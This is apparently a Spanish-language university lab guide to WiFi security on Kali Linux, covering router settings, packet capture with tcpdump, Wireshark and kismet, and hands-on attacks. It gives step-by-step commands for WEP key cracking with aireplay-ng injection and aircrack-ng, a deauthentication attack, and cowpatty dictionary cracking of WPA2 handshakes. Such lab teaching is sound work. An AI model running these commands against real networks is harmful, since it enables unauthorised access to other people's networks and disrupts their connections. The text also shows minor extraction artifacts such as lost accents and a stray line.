Anda di halaman 1dari 15

*Actividad Previa: Preparacin de Notebook con Kali

Objetivo: Preparar un equipo Laptop para iniciar con un sistema con Kali.
Este sistema contiene las herramientas necesarias para este laboratorio.
Preparacin de Pendrive para arranque con Kali.
Indicaciones para hacer fuera del laboratorio:
1. Bajar la ltima versin de la iso de Kali que se puede obtener desde

el sitio https://www.kali.org/downloads.
2. En un equipo linux usar el siguiente comando para transferir la
imagen hacia el pendrive. (El pendrive debe tener al menos un 25%
mas de capacidad de la imagen ISO, demora de 20 a 30 minutos)
dd if=kali.iso of=/dev/sdb
3. Una vez que haya terminado el comando anterior, el pendrive est

listo para operar como disco de arranque para un equipo.


Arranque de equipos con Sistema Kali.
Repartidos en la sala se dispondrn de algunos Laptops y pendrives los
cuales servirn para iniciar el sistema con Kali, para esto se deben seguir
los siguientes pasos:
1. Con el Laptop apagado, conectar el Pendrive en una puerta USB

disponible.
2. En el caso de utilizar el laptop Dell, encenderlo y enseguida presione
la techa F12.
3. En el men, seleccionar la opcin: USB Storage Device.
4. Enseguida aparecer un nuevo men. En ste seleccionar la primera
opcin: Live (amd64)

Nota: Si es ms cmodo para el usuario, se puede cambiar el idioma de


teclado de la siguiente forma:
1.
2.
3.

-Seleccionar en la esquina superior izquierda Applications>System Tools->Preferences->System Settings.


-Seleccionar Region and Language y luego layouts, agregar
el teclado Spanish (Latin American).
-Ahora en la esquina superior derecha saldr una cono de
seleccin de idioma (es y en).

Conexin a la Red WiFi del Laboratorio y obtencin de los archivos


para el laboratorio.
1.
2.
3.

4.

Con el mouse, situarse encima del cono de red de la parte


superior derecha de la pantalla y elegir la red adecuada.
Abrir el Navegador de Kali, llamado Iceweasel. Se puede
encontrar en Applcations->Internet->Iceweasel Web Browser.
Bajar el archivo labwifi.tgz de la siguiente ubicacin
http://www.cec.uchile.cl/~hveliz/labwifi.tgz . Grabar con la opcin
Save File .
Abrir una ventana de terminal y descomprimir el archivo
obtenido.
root@kali:~# tar zxfv Downloads/labwifi.tgz

5.

Se crear un directorio llamado labwifi en el directorio raiz de


usuario root.

Actividad 1: Configuracin de router Inalmbrico.


Objetivo: Familiarizarse con los parmetros configuracin y revisar las
posibilidades de seguridad que se encuentran en un equipo tpico.
Herramientas:
Browser Iceweasel, router Linksys WRT54G.
Configuracin APs
Configuracin router WRT54G v8.2.05
1. Abra su navegador y cargue la pgina que se encuentra en el archivo

"/root/labwifi/8.2.05/index.html".

2. Realice la siguientes opciones para navegar por la aplicacin de

configuracin del router.


a. Setup-> Basic Setup: Local IP Address y configuracin DHCP
b. Wireless -> Basic Wireless Settings: Definir SSID, puede ocultarse
el broadcast
c. Wireless -> Wireless security: configuracin de seguridad
d. Wireless -> Wireless MAC Filter
e. Wireless -> Advanced Wireless Setting

Configuracin centralizada de Antenas Inalmbricas


Ssssssss
ireless Wireless MAC Filter MAC Filter

Actividad 2: Captura de trfico con interfaz inalmbrica


con tcpdump y Wireshark
Objetivo: Observar el comportamiento y capacidades de herramientas de
captura no especializadas desde una interfaz inalmbrica.
Ejercicio 2.1: Utilizar tcpdump para aplicar en interfaz WiFi
1. En una ventana de terminal de Kali utilizar el tcpdump sobre la intefaz

WiFi del laptop. Cuando se haya capturado el suficiente trfico, detener


el comando con Ctrl-C
root@kali:~# tcpdump -n -i wlan0
2. Ahora en realizar la captura de la interfaz de monitoreo. Para esto

primero se debe levantar este tipo de interfaz con el siguiente


comando:
root@kali:~# airmon-zc start wlan0
Con esto se crea la interfaz wlan0mon para empezar la captura, se
puede revisar el listado de interfaces con la opcin -D de tcpdump.
root@kali:~# tcpdump -D
root@kali:~# tcpdump -n -i wlan0mon
Ahora con ms opciones:
root@kalil:~# tcpdump -n -i wlan0mon -e -vvv -A
Qu filtros se pueden realizar con tcpdump?
Ejercicio 2.2: Utilizar WireShark en la interfaz de monitoreo.
1. En un terminal de Kali, ejecutar la aplicacin Wireshark:

root@kali:~# wireshark
2. Seleccionar la interfaz de monitoreo para iniciar la captura.
3. Realizar el filtro para capturar la KEY de WEP (wlan.wep.key)

4. Realizar filtro para captura de Vectores de Iniciacin de WEP.

Actividad 3: Monitoreo y captura especializada de redes


WiFi.
Objetivo: Familiarizarse con herramientas especializadas en monitorear
redes inalmbricas.
Herramienta: kismet
Ejercicio 3.1:
1. Ejecutar kismet-server desde una ventana terminal.
root@kali:~# kismet-server -c wlan0mon
2. Desde una nueva ventana de terminal, abrir ahora el kismet cliente.

root@kali:~# kismet

3. Con ayuda del mouse seleccionar las opciones siguientes:


a. Kismet->Preferences->Network Columns . Habilitar que se

muestre el BSSID y el nmero de clientes .


b. Kismet->Preferences->Network Clients . Habilitar que se muestre
el nivel de seal del cliente y el nmero de paquetes de datos
transferidos.
c. Sort->Channel
d. Windows->Channel Details
Ejercicio 3.2:
1. Cerrar la aplicacin y revisar trfico capturado por kismet con la
aplicacin tcpdump.
root@kali:~# tcpdump -n -r Kismet-<FECHA-HORA>.pcapdump

Actividad 4: Intromisin a red WiFi.


Objetivo: Conocer formas de realizar captura de trfico y penetracin en
redes inalmbricas que poseen debilidades de configuracin.
Herramientas: airmon-zc, airodump-ng, aireplay-ng.
Descripcin Herramientas:

airmon-zc : Se utiliza para operar la interfaz en modo monitoreo e


inyeccin de trfico.
airodump-ng: Se utiliza para capturar trfico sobre una interface WiFi.
aireplay-ng: Es una herramienta que inyecta trfico sobre la interface
WiFi, este comando funciona en forma correcta solo con algunos
drivers de tarjetas.
wep_crack: Comando para obtener llave WEP usando fuerza bruta
aircrack-ng: Comando para obtener llave WEP usando fuerza bruta.
Puede usar multiprocesadores (puede no funcionar en cisco)
Otros programas: wepattack (usa diccionario)

Ejemplos:
wep_crack -b <archivo.dump>
root@kali:~# cd labwif
root@kali:~# tcpdump -xvvvnnn -s 1500 -r nd2.dump
root@kali:~# ./wep_crack -b nd2.dump
aircrack-ng <archivo.dump>
root@kali:~# aircrack-ng aircrack.dump
Ejercicio 4.1:
Actividad Previa:
- Revisar si existe la interfaz de monitoreo wlan0mon. En caso negativo,
iniciar el modo monitor de la interface wifi0
root@kali:~# airmon-zc start wlan0

-Utilizar airodump para ver redes al alcance. Ejecutar


root@kali:~# airodump-ng wlan0mon

Ejercicio 4.2:
- Obtener la clave WEP de la red con SSID "lab-redes".
- Revisar ejercicio anterior para ver el canal y BSSID (mac-address del ssid
objetivo).
- Abrir un terminal para dejar ejecutando la captura de trfico del ssid
objetivo. Ejecutar:
root@kali:~# airodump -c 3 -w lab --bssid 00:16:B6:14:71:F5
wlan0mon
- Abrir otro terminal para emular una autenticacin al SSID lab. Ejecutar:
root@kali:~# aireplay-ng -1 0 -a 00:16:B6:14:71:F5 -h <mac-address
equipo> wlan0mon

- Una vez finalizado el comando anterior, inyectar ARP-request a el SSID


lab. Ejecutar:
root@kali:~# aireplay-ng -3 -b 00:16:B6:14:71:F5 -h <mac-address
equipo> wlan0mon
- Observar el aumento de la columna #Data, se debe esperar un nmero
alto para poder terminar la captura.
Se recomienda capturar ms de 15.000 paquetes.
- Obtener la clave WEP del ejercicio.
root@kali:~# aircrack-ng lab.cap

Actividad 5: Deauth attack


Objetivo: Conocer herramientas para desautenticar un usuario de la red
inalmbrica
Herramienta: aireplay-ng
root@kali:~# aireplay-ng -0 3 -c MAC_CLIENT -a MAC_AP wlan0mon

Actividad 6: Cracking de WPA-PSK y WPA2-PSK


Objetivo: Familiarizarse con herramienta de fuerza bruta para el cracking de
password.
Herramienta: cowpatty
Ejercicio 1: Utilizar archivo de captura de trfico de ejemplo. Nombre de la
red SANS
root@kali:~# cd labwif
root@kali:~# cowpatty -r lab10capture1.dump -f words -s SANS

Ejercicio 2: Generar captura en vivo de una red activa en el laboratorio con


WPA2. Por ejemplo puede ser cualquier red con WPA2 personal compartida
por un telefono celular.
root@kali:~# airodump-ng -c <canal> -w <archivo_red> --bssid <macaddress AP> wlan0mon

Luego de capturado el Handshake WPA2, utilizar el comando cowpatty y


esperar la obtencin de la frase.
root@kali:~# cowpatty -r <archivo_red> -f words -s <nombre-red>